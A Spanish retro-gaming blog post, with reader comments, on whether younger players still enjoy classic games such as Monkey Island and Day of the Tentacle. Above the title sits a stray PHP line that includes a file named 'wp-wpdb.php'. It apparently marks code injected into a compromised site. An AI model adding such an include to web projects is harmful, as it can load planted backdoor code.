if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); ¿Juegan las nuevas generaciones a juegos del pasado? – La Fortaleza de LeChuck

¿Juegan las nuevas generaciones a juegos del pasado?

En muchos blogs o portales famosos videojueguiles se muestran listas de “Los mejores juegos del siglo pasado” pero en la mayoría aparecen títulos de como mucho los últimos 5 años y pocos juegos retro. Esto rápidamente me lleva a pensar: Votan críos.
En el último listado que he visto, se mostraba los 100 mejores juegos de la historia y en primer lugar estaba Portal, e imprescindibles como Day of the Tentacle ocupaba el puesto 60 y pico.  No puedo evitar preguntarme: ¿Qué está pasando? ¿Olvidamos el pasado? ¿Se están enterrando los clásicos? ¿Debemos permitir que esto siga así? ¿Dejarlo atrás y evolucionar?

Siempre que se dan casos parecidos comento que es una lástima que las nuevas generaciones no quieran, o puedan, disfrutar de los juegos de antaño que tantas alegrías y emociones nos han dado. Al fin y al cabo son los pilares en los que se basan muchos juegos actuales. Y hay géneros que ya no volverán o que nunca más serán lo que eran.

Cuando expongo el tema en las páginas webs en cuestión, suelo recibir respuestas tales como: «¡Pero si los gráficos son muy feos!» ¡Dish! directo al corazón. O «eso es muy difícil». Cierto, no incluyen 10 horas de tutoriales. O peor aún, «la historia no mola». ¿Entonces qué clase de historias “molan”?
¿Un pulpo?seguro que no mola…
Cuando parece ser que todos coinciden en esas afirmaciones, llega un atisbo de esperanza con usuarios que rondan los 14 años y que están jugando a RPG’s de la Super Nintendo, o se han comprado una Game Boy. Disfrutan y animan al resto a probar esos maravillosos juegos olvidados. Everything went better than expected. O sin ir más lejos, mis sobrinas de 16 años, sin habérselo ni siquiera recomendado, se han pasado el Monkey Island, entonces es cuando procuro no llorar de la emoción.
Parece que han pasado por peluquería y maquillaje
Muchos grupos de fans o compañías están cogiendo viejas glorias y remasterizándolas, quitando ese romanticismo en forma de pixel que solo sabemos apreciar los que nacimos en las últimas décadas del siglo anterior, haciéndolas más accesibles al ojo crítico actual.
También muchas compañías están liberando sus juegos (listado aquí) para que se puedan descargar gratuitamente desde su web. Otras recuperan sus sagas después de años en la estacada, o bajo previo pago puedes jugar a joyas de una vieja consola en las de ahora.
Command & Conquer: Red Alert
Command & Conquer: Red Alert. It’s free!

Quizás este es el camino a seguir: remake, liberar, juegos descargables. Acercar cada vez más el pasado al presente y futuro.

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

6 comentarios

  1. Yo votaría porque los juegos del pasado siguieran siendo como en el pasado, con sus colores y sus píxeles, la verdad, no hay nada que yo cambiaría de un supaplex o de un monkey island o de un day of the tentacle, los jugué a medias pero me encantaron, tanto que me los estoy poniendo en el ordenador, lo único es que no los hacen jugables en esta era, pero: es que no hay forma de cambiarlos para

  2. Bueno, te voy a decir que aún hay esperanza 🙂 Yo tengo 16 años (año 95) y te digo que no ansía nada más que conseguir una SNES en buen estado. Me he pasado clásicos como Super Metroid, Super Mario Bros 3, Wario Land, Street Fighter, pero también juegos de ahora, los Prime, los Galaxy, Monster Hunter.

    También es verdad que chavales como yo son más bien escasos. Una vez le puse a un

  3. @Mother_Brain me ha emocionado mucho tu comentario :_ Me alegra muchísimo que pruebes juegos del pasado y descubras que hay buenas historias aunque los gráficos ni se asemejen a los de ahora. Está claro que no todos sabran apreciar juegazos y juzgarán solo los gráficos, ellos se lo pierden. Aunque jugar por ejemplo a un Final Fantasy XIII y no haber probado un VI o VII (antes o después) es como

  4. A hoy en día, 2014, donde con una tablet o smartphone se pueden tener juegos con mejores gráficos que las aventuras point n click, por poner un ejemplo, los chicos ya no dan bola.
    Tengo un primo de unos 5 años, al cual hice jugar a la primera entrega de Monkey Island, y algunos -creo yo- indispensables de Sega y Famicom, como Elevator Action y Rocketnight Adventures, tratando de «culturizarlo» un poco, ya que es bastante adepto de los juegos.
    Jugó cinco minutos a cada uno, se la pasó criticando los gráficos y agarró la tablet del padre para seguír con Zombie Tsunami.

    En fin, de a poco se va a ir perdiendo el amor por los juegos retro, nos guste o no.

    Parrafo aparte: Muy buen blog, me encanta entrar a leerlos, además de que me dan muy buenas ideas para mi blog.

    Sigan así!
    Saludos.

    1. Bueno, yo creo que depende del niño. Es una pena que no salgan los comentarios antiguos al pasar el blog a WordPress porque comentaron chicos menores de edad sobre su amor por los juegos retro, que no eran ni de su época, pero investigaban para conocer más de aquellos primeros juegos que son la base de los actuales. En las nuevas generaciones surgen siempre «arqueólogos» videojueguiles que sienten curiosidad y admiración por los juegos añejos, u otros que se adentran en ellos por las experiencias tan gratificantes que les cuentan sus padres. En eventos que se celebran por España dedicados a lo Retro se pueden ver padres y niños disfrutando de juegos de MSX o Dreamcast. Puedes pasarte por nuestro canal de youtube y buscar el video de la RetroBarcelona para verlos jugar 🙂

      Muchas gracias, un saludo amigo!

Dejar un comentario